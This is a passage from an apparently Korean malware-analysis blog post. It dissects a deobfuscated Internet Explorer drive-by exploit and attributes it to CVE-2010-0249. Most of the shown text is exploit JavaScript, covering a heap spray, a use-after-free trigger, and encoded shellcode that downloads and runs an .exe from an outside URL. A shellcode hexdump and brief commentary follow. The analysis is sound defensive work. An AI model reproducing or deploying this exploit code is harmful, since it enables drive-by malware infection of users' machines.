         s += YT("%u50A3%u9AE8%u0000%u8300%u08C4%uE8C3%uFE42%uFFFF%u6868%uC524%u50B3%u86E8%u0000%u8300%u08C4%uE8C3%u0057");
         s += YT("%u0000%u7268%uB3FE%u5016%u72E8%u0000%u8300%u08C4%uE8C3%uFE44%uFFFF%u13EB%u656A%uE850%uFBE0%uFFFF%uE850");
         s += YT("%uFEAB%uFFFF%uB5E9%uFFFC%uE8FF%uFFE8%uFFFF%uE8C3%uFDA9%uFFFF%u4F68%u4FEF%u5005%u3EE8%u0000%u8300%u08C4");
         s += YT("%uE8C3%u000F%u0000%u8E68%u0E4E%u50EC%u2AE8%u0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B");
         s += YT("%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246C%u3624%u458B");
         s += YT("%u363C%u548B%u7828%uD503%u8B3E%u184A%u8B3E%u205A%uDD03%u3BE3%u3E49%u348B%u038B%u33F5%u33FF%uFCC0%u84AC");
         s += YT("%u74C0%uC107%u0DCF"+YUYttian+"%u5A8B%u0324%u66DD%u8B3E%u4B0C%u8B3E%u1C5A%uDD03");
         s += YT("%u8B3E%u8B04%uC503"+YTavp);
         
         var u = YT("%u7468%u7074%u2F3A%u712F%u7377%u7177%u6E2E%u7465%u312F%u652E%u6578%u0000");
         var sc = s + u;
         var n = unescape("%u0c0d%u0c0d");
         while (n.length<=524288) 
            n +=n ;
         
         n=n.substring(0, 524269 - sc.length);
         var x=new Array();
         for (var i=0 ; i < 200; i++) {
             x[i]=n + sc;
         }
         var x1=new Array();
         for (i=0 ; i < 500; i++) {
             x1[i]=document.createElement( "COMMENT");
             x1[i].data="abc" ;
         };
         
         var e1=null;
         function ev1(evt)
         {
             e1=document.createEventObject(evt);
             document.getElementById("sp1").innerHTML="" ;
             window.setInterval(ev2, 50);
         }
         function ev2()
         { 
            p="\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
             for (i=0 ; i < x1.length; i++)
             {
                 x1[i].data=p ;
             };
         var t=e1.srcElement;
         }
     }
     </script>
     <span id="sp1">
        <IMG SRC="ytl.gif" onload="ev1(event)">
     </span> 
      </body>
</html>

난독화를 해제하고 나면 바로 눈에 띄는 것은 p 변수와 유니코드 문자열입니다. 이 두 가지 정보만으로도 이 웹 기반 악성코드가 IE 취약점을 이용하여 악성코드를 유포하려 했다는 것을 알 수 있습니다.


split되어 있는 변수들을 합쳐 한 줄의 unicode로 만들고, 이 unicode를 분석하면 다음과 같은 결과를 볼 수 있습니다. 결정적인 것은 u 변수에 저장된 unicode가 악성코드 보관소의 위치(URL)를 가리키고 있다는 점입니다.

........

00000400  01 00 00 83 c4 08 c3 e8 e3 00 00 00 68 7e d8 e2  |............h~..|

00000410  73 50 e8 fe 00 00 00 83 c4 08 c3 e8 cf 00 00 00  |sP..............|

00000420  68 9e f9 bb 35 50 e8 ea 00 00 00 83 c4 08 c3 e8  |h...5P..........|

00000430  92 fe ff ff 68 57 a0 b5 bb 50 e8 d6 00 00 00 83  |....hW...P......|

00000440  c4 08 c3 e8 7e fe ff ff 68 1a 7a 1e 02 50 e8 c2  |....~...h.z..P..|

00000450  00 00 00 83 c4 08 c3 e8 6a fe ff ff 68 e0 5b 30  |........j...h.[0|

00000460  94 50 e8 ae 00 00 00 83 c4 08 c3 e8 56 fe ff ff  |.P..........V...|

00000470  68 97 c9 e2 a3 50 e8 9a 00 00 00 83 c4 08 c3 e8  |h....P..........|

00000480  42 fe ff ff 68 68 24 c5 b3 50 e8 86 00 00 00 83  |B...hh$..P......|

00000490  c4 08 c3 e8 57 00 00 00 68 72 fe b3 16 50 e8 72  |....W...hr...P.r|

000004a0  00 00 00 83 c4 08 c3 e8 44 fe ff ff eb 13 6a 65  |........D.....je|

000004b0  50 e8 e0 fb ff ff 50 e8 ab fe ff ff e9 b5 fc ff  |P.....P.........|

000004c0  ff e8 e8 ff ff ff c3 e8 a9 fd ff ff 68 4f ef 4f  |............hO.O|

000004d0  05 50 e8 3e 00 00 00 83 c4 08 c3 e8 0f 00 00 00  |.P.>............|

000004e0  68 8e 4e 0e ec 50 e8 2a 00 00 00 83 c4 08 c3 33  |h.N..P.*.......3|

000004f0  c0 64 8b 40 30 85 c0 78 10 3e 8b 40 0c 3e 8b 70  |.d.@0..x.>.@.>.p|

00000500  1c ad 3e 8b 40 08 c3 eb 0b 3e 8b 40 34 83 c0 7c  |..>.@....>.@4..||

00000510  3e 8b 40 3c c3 60 36 8b 6c 24 24 36 8b 45 3c 36  |>.@<.`6.l$$6.E<6|

00000520  8b 54 28 78 03 d5 3e 8b 4a 18 3e 8b 5a 20 03 dd  |.T(x..>.J.>.Z ..|

00000530  e3 3b 49 3e 8b 34 8b 03 f5 33 ff 33 c0 fc ac 84  |.;I>.4...3.3....|

00000540  c0 74 07 c1 cf 0d 03 f8 eb f4 36 3b 7c 24 28 75  |.t........6;|$(u|

00000550  df 3e 8b 5a 24 03 dd 66 3e 8b 0c 4b 3e 8b 5a 1c  |.>.Z$..f>..K>.Z.|

00000560  03 dd 3e 8b 04 8b 03 c5 36 89 44 24 1c 61 c3 e8  |..>.....6.D$.a..|

00000570  4f fb ff ff 68 74 74 70 3a 2f 2f 2a 2a 2a 2a 2a  |O...http://*****|

00000580  2a 2a 2a 2a 2a 31 2e 65 78 65 00 00              |****/1.exe..|

IE 취약점을 이용하여 유포하려는 최종 악성코드의 URL 주소를 볼 수 있습니다. 비록 실행되지 않는 난독화이지만 악성코드를 유포하려는 공격자의 목표를 알 수 있습니다. 취약점 CVE 번호는 CVE-2010-0249로 추측됩니다.


* 실제 악성코드 유포하는 소스코드 중 샘플이기 때문에 일부 내용을 변경하였습니다.



  • 사랑을구걸하는거지 2013.06.19 21:26 신고 댓글주소 수정/삭제 댓글쓰기

    좋은 정보 감사합니다.

    " มี(UTF-8 문제로 ??로 표시됨)를 제거하는 구문이 존재하지 않음. 수동으로 제거. " 라고 하셨는데 해당 문자열을 삭제하지 않으면 코드가 정상적으로 실행이 되지 않는가요???

    • 안녕하세요.
      특수한 문자로 인해 실행이 안되는 것은 아닙니다. 스크립트 소스코드 자체에 문제가 존재합니다. ^^

